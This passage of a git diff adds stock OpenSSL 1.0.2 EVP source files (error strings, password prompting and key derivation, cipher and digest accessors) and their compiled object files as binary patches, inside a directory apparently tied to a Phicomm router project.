+    {ERR_REASON(EVP_R_UNSUPPORTED_KEYLENGTH), "unsupported keylength"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_KEY_DERIVATION_FUNCTION),
+     "unsupported key derivation function"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_KEY_SIZE), "unsupported key size"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_PRF), "unsupported prf"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM),
+     "unsupported private key algorithm"},
+    {ERR_REASON(EVP_R_UNSUPPORTED_SALT_TYPE), "unsupported salt type"},
+    {ERR_REASON(EVP_R_WRAP_MODE_NOT_ALLOWED), "wrap mode not allowed"},
+    {ERR_REASON(EVP_R_WRONG_FINAL_BLOCK_LENGTH), "wrong final block length"},
+    {ERR_REASON(EVP_R_WRONG_PUBLIC_KEY_TYPE), "wrong public key type"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_EVP_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(EVP_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, EVP_str_functs);
+        ERR_load_strings(0, EVP_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..3447cbd847685bfc09f4b725e6a97cf24b99df97
GIT binary patch
literal 1360
zcmbtS%}T>S5S|!+>JM1OgP=$}si;f+L-Zg8sa`~+Q1K!mt!pc`X-T%ydeB$sqxcAd
zFW_T%RJ?i7nPxZLt`$KCCNuNxeDjmt`^?cnpJjm(3-+KBDHPzOuj8lNZW_j56yC?@
zKAzxke}C6m%;oF8s5?7sgQZs2w(IS1?QT8AQkzQ=4E@MWq7I-Q9_IkdJ`!f5l1xPg
ztlKPDjifa*Hk4@LK!nfAGvfXxv_n6<efG+;du~WGXiI8DJDyGh(Y4!KbYm3RF!&v8
z<3m5-^ar|S6vIhv&Uj~jQ*(I`umWVVS+`vEF5JxNi5rUG$}fiC$TGA^*ETF{R)m)a
zhMAEqDNpc*0CwRC4_H17ffcHi3ilE7tAaDUrqxh*g=-lX{W_}!)fx{(6Ij5@9^)nV
zGVm%~Hvfm2K`z~$`3KXoX8a#yOu4$uV?daCPwFhA9K)LY1w2on{*}LiT&kHu)kXDR
z)<N`De`U8cOi!)pf#xfof~XI@vaY+wSn(b7b)j8#Imdu%n*5ebGWRn1XP8H?IW6;*
zd6t7tOJEo+&8heb@70?qkMu!#jSP&Sr5YxmF!Sz+@*w*=6lfyh7@0t?7ym^j7URsw
GG5KE_yHCFW

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_key.c
new file mode 100644
index 0000000..71fa627
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_key.c
@@ -0,0 +1,193 @@
+/* crypto/evp/evp_key.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/ui.h>
+
+/* should be init to zeros. */
+static char prompt_string[80];
+
+void EVP_set_pw_prompt(const char *prompt)
+{
+    if (prompt == NULL)
+        prompt_string[0] = '\0';
+    else {
+        strncpy(prompt_string, prompt, 79);
+        prompt_string[79] = '\0';
+    }
+}
+
+char *EVP_get_pw_prompt(void)
+{
+    if (prompt_string[0] == '\0')
+        return (NULL);
+    else
+        return (prompt_string);
+}
+
+/*
+ * For historical reasons, the standard function for reading passwords is in
+ * the DES library -- if someone ever wants to disable DES, this function
+ * will fail
+ */
+int EVP_read_pw_string(char *buf, int len, const char *prompt, int verify)
+{
+    return EVP_read_pw_string_min(buf, 0, len, prompt, verify);
+}
+
+int EVP_read_pw_string_min(char *buf, int min, int len, const char *prompt,
+                           int verify)
+{
+    int ret;
+    char buff[BUFSIZ];
+    UI *ui;
+
+    if ((prompt == NULL) && (prompt_string[0] != '\0'))
+        prompt = prompt_string;
+    ui = UI_new();
+    UI_add_input_string(ui, prompt, 0, buf, min,
+                        (len >= BUFSIZ) ? BUFSIZ - 1 : len);
+    if (verify)
+        UI_add_verify_string(ui, prompt, 0,
+                             buff, min, (len >= BUFSIZ) ? BUFSIZ - 1 : len,
+                             buf);
+    ret = UI_process(ui);
+    UI_free(ui);
+    OPENSSL_cleanse(buff, BUFSIZ);
+    return ret;
+}
+
+int EVP_BytesToKey(const EVP_CIPHER *type, const EVP_MD *md,
+                   const unsigned char *salt, const unsigned char *data,
+                   int datal, int count, unsigned char *key,
+                   unsigned char *iv)
+{
+    EVP_MD_CTX c;
+    unsigned char md_buf[EVP_MAX_MD_SIZE];
+    int niv, nkey, addmd = 0;
+    unsigned int mds = 0, i;
+    int rv = 0;
+    nkey = type->key_len;
+    niv = type->iv_len;
+    OPENSSL_assert(nkey <= EVP_MAX_KEY_LENGTH);
+    OPENSSL_assert(niv <= EVP_MAX_IV_LENGTH);
+
+    if (data == NULL)
+        return (nkey);
+
+    EVP_MD_CTX_init(&c);
+    for (;;) {
+        if (!EVP_DigestInit_ex(&c, md, NULL))
+            return 0;
+        if (addmd++)
+            if (!EVP_DigestUpdate(&c, &(md_buf[0]), mds))
+                goto err;
+        if (!EVP_DigestUpdate(&c, data, datal))
+            goto err;
+        if (salt != NULL)
+            if (!EVP_DigestUpdate(&c, salt, PKCS5_SALT_LEN))
+                goto err;
+        if (!EVP_DigestFinal_ex(&c, &(md_buf[0]), &mds))
+            goto err;
+
+        for (i = 1; i < (unsigned int)count; i++) {
+            if (!EVP_DigestInit_ex(&c, md, NULL))
+                goto err;
+            if (!EVP_DigestUpdate(&c, &(md_buf[0]), mds))
+                goto err;
+            if (!EVP_DigestFinal_ex(&c, &(md_buf[0]), &mds))
+                goto err;
+        }
+        i = 0;
+        if (nkey) {
+            for (;;) {
+                if (nkey == 0)
+                    break;
+                if (i == mds)
+                    break;
+                if (key != NULL)
+                    *(key++) = md_buf[i];
+                nkey--;
+                i++;
+            }
+        }
+        if (niv && (i != mds)) {
+            for (;;) {
+                if (niv == 0)
+                    break;
+                if (i == mds)
+                    break;
+                if (iv != NULL)
+                    *(iv++) = md_buf[i];
+                niv--;
+                i++;
+            }
+        }
+        if ((nkey == 0) && (niv == 0))
+            break;
+    }
+    rv = type->key_len;
+ err:
+    EVP_MD_CTX_cleanup(&c);
+    OPENSSL_cleanse(&(md_buf[0]), EVP_MAX_MD_SIZE);
+    return rv;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_key.o
new file mode 100644
index 0000000000000000000000000000000000000000..b054ff9a368c2a48b5f1338a171a5bb1f16d8906
GIT binary patch
literal 4544
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
WirYN-d%EO`YW6(;$6;I+ul;|{ylK7w

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_lib.c
new file mode 100644
index 0000000..a53a27c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_lib.c
@@ -0,0 +1,367 @@
+/* crypto/evp/evp_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+# include "evp_locl.h"
+#endif
+
+int EVP_CIPHER_param_to_asn1(EVP_CIPHER_CTX *c, ASN1_TYPE *type)
+{
+    int ret;
+
+    if (c->cipher->set_asn1_parameters != NULL)
+        ret = c->cipher->set_asn1_parameters(c, type);
+    else if (c->cipher->flags & EVP_CIPH_FLAG_DEFAULT_ASN1) {
+        if (EVP_CIPHER_CTX_mode(c) == EVP_CIPH_WRAP_MODE) {
+            ASN1_TYPE_set(type, V_ASN1_NULL, NULL);
+            ret = 1;
+        } else
+            ret = EVP_CIPHER_set_asn1_iv(c, type);
+    } else
+        ret = -1;
+    return (ret);
+}
+
+int EVP_CIPHER_asn1_to_param(EVP_CIPHER_CTX *c, ASN1_TYPE *type)
+{
+    int ret;
+
+    if (c->cipher->get_asn1_parameters != NULL)
+        ret = c->cipher->get_asn1_parameters(c, type);
+    else if (c->cipher->flags & EVP_CIPH_FLAG_DEFAULT_ASN1) {
+        if (EVP_CIPHER_CTX_mode(c) == EVP_CIPH_WRAP_MODE)
+            return 1;
+        ret = EVP_CIPHER_get_asn1_iv(c, type);
+    } else
+        ret = -1;
+    return (ret);
+}
+
+int EVP_CIPHER_get_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type)
+{
+    int i = 0;
+    unsigned int l;
+
+    if (type != NULL) {
+        l = EVP_CIPHER_CTX_iv_length(c);
+        OPENSSL_assert(l <= sizeof(c->iv));
+        i = ASN1_TYPE_get_octetstring(type, c->oiv, l);
+        if (i != (int)l)
+            return (-1);
+        else if (i > 0)
+            memcpy(c->iv, c->oiv, l);
+    }
+    return (i);
+}
+
+int EVP_CIPHER_set_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type)
+{
+    int i = 0;
+    unsigned int j;
+
+    if (type != NULL) {
+        j = EVP_CIPHER_CTX_iv_length(c);
+        OPENSSL_assert(j <= sizeof(c->iv));
+        i = ASN1_TYPE_set_octetstring(type, c->oiv, j);
+    }
+    return (i);
+}
+
+/* Convert the various cipher NIDs and dummies to a proper OID NID */
+int EVP_CIPHER_type(const EVP_CIPHER *ctx)
+{
+    int nid;
+    ASN1_OBJECT *otmp;
+    nid = EVP_CIPHER_nid(ctx);
+
+    switch (nid) {
+
+    case NID_rc2_cbc:
+    case NID_rc2_64_cbc:
+    case NID_rc2_40_cbc:
+
+        return NID_rc2_cbc;
+
+    case NID_rc4:
+    case NID_rc4_40:
+
+        return NID_rc4;
+
+    case NID_aes_128_cfb128:
+    case NID_aes_128_cfb8:
+    case NID_aes_128_cfb1:
+
+        return NID_aes_128_cfb128;
+
+    case NID_aes_192_cfb128:
+    case NID_aes_192_cfb8:
+    case NID_aes_192_cfb1:
+
+        return NID_aes_192_cfb128;
+
+    case NID_aes_256_cfb128:
+    case NID_aes_256_cfb8:
+    case NID_aes_256_cfb1:
+
+        return NID_aes_256_cfb128;
+
+    case NID_des_cfb64:
+    case NID_des_cfb8:
+    case NID_des_cfb1:
+
+        return NID_des_cfb64;
+
+    case NID_des_ede3_cfb64:
+    case NID_des_ede3_cfb8:
+    case NID_des_ede3_cfb1:
+
+        return NID_des_cfb64;
+
+    default:
+        /* Check it has an OID and it is valid */
+        otmp = OBJ_nid2obj(nid);
+        if (!otmp || !otmp->data)
+            nid = NID_undef;
+        ASN1_OBJECT_free(otmp);
+        return nid;
+    }
+}
+
+int EVP_CIPHER_block_size(const EVP_CIPHER *e)
+{
+    return e->block_size;
+}
+
+int EVP_CIPHER_CTX_block_size(const EVP_CIPHER_CTX *ctx)
+{
+    return ctx->cipher->block_size;
+}
+
+int EVP_Cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+               const unsigned char *in, unsigned int inl)
+{
+    return ctx->cipher->do_cipher(ctx, out, in, inl);
+}
+
+const EVP_CIPHER *EVP_CIPHER_CTX_cipher(const EVP_CIPHER_CTX *ctx)
+{
+    return ctx->cipher;
+}
+
+unsigned long EVP_CIPHER_flags(const EVP_CIPHER *cipher)
+{
+#ifdef OPENSSL_FIPS
+    const EVP_CIPHER *fcipher;
+    fcipher = evp_get_fips_cipher(cipher);
+    if (fcipher && fcipher->flags & EVP_CIPH_FLAG_FIPS)
+        return cipher->flags | EVP_CIPH_FLAG_FIPS;
+#endif
+    return cipher->flags;
+}
+
+unsigned long EVP_CIPHER_CTX_flags(const EVP_CIPHER_CTX *ctx)
+{
+#ifdef OPENSSL_FIPS
+    return EVP_CIPHER_flags(ctx->cipher);
+#else
+    return ctx->cipher->flags;
+#endif
+}
+
+void *EVP_CIPHER_CTX_get_app_data(const EVP_CIPHER_CTX *ctx)
+{
+    return ctx->app_data;
+}
+
+void EVP_CIPHER_CTX_set_app_data(EVP_CIPHER_CTX *ctx, void *data)
+{
+    ctx->app_data = data;
+}
+
+int EVP_CIPHER_iv_length(const EVP_CIPHER *cipher)
+{
+    return cipher->iv_len;
+}
+
+int EVP_CIPHER_CTX_iv_length(const EVP_CIPHER_CTX *ctx)
+{
+    return ctx->cipher->iv_len;
+}
+
+int EVP_CIPHER_key_length(const EVP_CIPHER *cipher)
+{
+    return cipher->key_len;
+}
+
+int EVP_CIPHER_CTX_key_length(const EVP_CIPHER_CTX *ctx)
+{
+    return ctx->key_len;
+}
+
+int EVP_CIPHER_nid(const EVP_CIPHER *cipher)
+{
+    return cipher->nid;
+}
+
+int EVP_CIPHER_CTX_nid(const EVP_CIPHER_CTX *ctx)
+{
+    return ctx->cipher->nid;
+}
+
+int EVP_MD_block_size(const EVP_MD *md)
+{
+    return md->block_size;
+}
+
+int EVP_MD_type(const EVP_MD *md)
+{
+    return md->type;
+}
+
+int EVP_MD_pkey_type(const EVP_MD *md)
+{
+    return md->pkey_type;
+}
+
+int EVP_MD_size(const EVP_MD *md)
+{
+    if (!md) {
+        EVPerr(EVP_F_EVP_MD_SIZE, EVP_R_MESSAGE_DIGEST_IS_NULL);
+        return -1;
+    }
+    return md->md_size;
+}
+
+#ifdef OPENSSL_FIPS
+
+const EVP_MD *evp_get_fips_md(const EVP_MD *md)
+{
+    int nid = EVP_MD_type(md);
+    if (nid == NID_dsa)
+        return FIPS_evp_dss1();
+    else if (nid == NID_dsaWithSHA)
+        return FIPS_evp_dss();
+    else if (nid == NID_ecdsa_with_SHA1)
+        return FIPS_evp_ecdsa();
+    else
+        return FIPS_get_digestbynid(nid);
+}
+
+const EVP_CIPHER *evp_get_fips_cipher(const EVP_CIPHER *cipher)
+{
+    int nid = cipher->nid;
+    if (nid == NID_undef)
+        return FIPS_evp_enc_null();
+    else
+        return FIPS_get_cipherbynid(nid);
+}
+
+#endif
+
+unsigned long EVP_MD_flags(const EVP_MD *md)
+{
+#ifdef OPENSSL_FIPS
+    const EVP_MD *fmd;
+    fmd = evp_get_fips_md(md);
+    if (fmd && fmd->flags & EVP_MD_FLAG_FIPS)
+        return md->flags | EVP_MD_FLAG_FIPS;
+#endif
+    return md->flags;
+}
+
+const EVP_MD *EVP_MD_CTX_md(const EVP_MD_CTX *ctx)
+{
+    if (!ctx)
+        return NULL;
+    return ctx->digest;
+}
+
+void EVP_MD_CTX_set_flags(EVP_MD_CTX *ctx, int flags)
+{
+    ctx->flags |= flags;
+}
+
+void EVP_MD_CTX_clear_flags(EVP_MD_CTX *ctx, int flags)
+{
+    ctx->flags &= ~flags;
+}
+
+int EVP_MD_CTX_test_flags(const EVP_MD_CTX *ctx, int flags)
+{
+    return (ctx->flags & flags);
+}
+
+void EVP_CIPHER_CTX_set_flags(EVP_CIPHER_CTX *ctx, int flags)
+{
+    ctx->flags |= flags;
+}
+
+void EVP_CIPHER_CTX_clear_flags(EVP_CIPHER_CTX *ctx, int flags)
+{
+    ctx->flags &= ~flags;
+}
+
+int EVP_CIPHER_CTX_test_flags(const EVP_CIPHER_CTX *ctx, int flags)
+{
+    return (ctx->flags & flags);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..fd2d69d7eec56e688a9f703a3b49b9ef1fbe88ff
GIT binary patch
literal 6352
zcmbuDeP~<P6~M18yLLKPQu>j4ZJMdDqz;RPm1WckOVG2W=p|KS*Oogkad?)M7u&Hc
z3F+C1LrIp|E)h!DVEH4AmO*Lv0UeaWMp{g2aJMuN)~v9x!A9MZEeYP%jD9TLJhXG}
zJIB7hmZ7i<Pxs#6J?Gr>&b{xx^K?2I-&<W(CAd_HJz}}XREX;jF1N$785Vxw6Ce9F
z{oCj<64B6&p6+MN>Cc=#vs7mm|Ff_7X{6NOU`#Ih#~aP_524QG5%@9B@5c5m{4vju
zG)9Ua#)}`B#eYZ=**QP9Av%5I)I;XvTvMd@0SuVM_dkAlp~jfJRz4Uh&L28#^cjce
zaAusU)EPFX-*c+VADX4G-}mNxL*f3-b>N!0yBcoAS$Dg)TrN+(Q=YqoH|FYrpKV5>
z$1Hx@?Yg_#*XN{vs;>p~^^jTo2pqVL?uTaCi+#mA;7F_P$X3OXv4=ZD?_I71wRrK0
zyjSVZ!MWSV$Uhm&M5OeDac1!q@YOeU6Qob?gBb4iP5lbnk3f5qZ|YrWLu<23p;fyu
z0>1;ksh{A;nZ+MN<(vAUE0*+4U4+&`9}N7U8mx3fqX>;tTZ}V*D?tNv>yNLeRob7b
zdC9E0zNb8I%%B?!M?m~%&~Oex<LB7uTJRe)h!#v^2FXG=QoQLdY4M6VJ?r?*$rFv@
z5=<*1zR3K72R4WtU)W&GY(j6m#>{4{?=faDD6p_bpA2UyR>NT}g_oMetL6RxtvL<H
z{49qn&#>QZ6py=&QmlccN@2HIiq%V0iVeAS-I9d6JxZ}7>cEmi)8(<RbiVl`@HQHn
z4PCwb613jB2Y%$8!4^9>$F|K9dsn<`PL~}IY%_P3)Mw_p<F2>=`n?Ig$EgPzkKa*b
za<a`bZm$%}flNB^&E0{*@JTy+v?<lRXLx+8u*Y*&dUzn16312#f`?zI#M;|;1)6#W
z#xl-WU}x~_!ItLGlVh?QI<>te*s^1*i-o8GgMPSh>0$?Z1Z<*NWFEM%@NrRfvP)E*
z@K-(BP*?wb*eE+-Y@?JA;w094z5esnZQjOno`^T_e2w94nyfXvE!6|wCIE)FvCZpm
z^VZ{B3DRq&x(VtbY9GM*DX;%rHK;s~wkB(GbKb_tuR;Bqw;uhuK(cYHN4@?YZ@p-Q
z=Bva#;2-*PuDW^=hUERdLu1gD1^xIFwZB9)vOCmnP*@GxgQDs-5?kjE$vL(WQ+2}?
z<PsIw5HWR*=ZLBPVeGM}axYh4@=OA`Iw|eO;2O!@tFZYBx}OkJb?aecVBvXj9X1l%
zh6DS({=*P#jNuOAYHUnmIF1GDK4NOTa>Tq+%9WcUruu!cg6^vobZ0ePGP|n6TdooR
zEUy{>;Hmf~Mb1yjN-d9ks#Y@WdE`@8iR0O`x_AUfaOIdsa3pljJ7t->1fTAe#a)M5
z@xV$f<og}`d`#om^(?La^57%TykCirJPUw@;NrDjmWDHC4c@f|PXkB$Y?sfBY2vR#
zjYXatP`?0IrFnk|T>43SI}Uv;_y(>d|7YMRA18TvrU3i<8uFj7!S4lqw9`TRke{Cb
z@oy35mD@#pfH*%JQQ{fR&LQIC#CgZ0iJ#W&oFR_c0v48kk@y9Tzd`&(;_Ux#h`&Od
z{l7{4HBJ7%#4l<5Vd!Ig_&Mb>XAAKwB+om3C-L7BXMdg|{zu|$2jh$O=Qa5u;<t!z
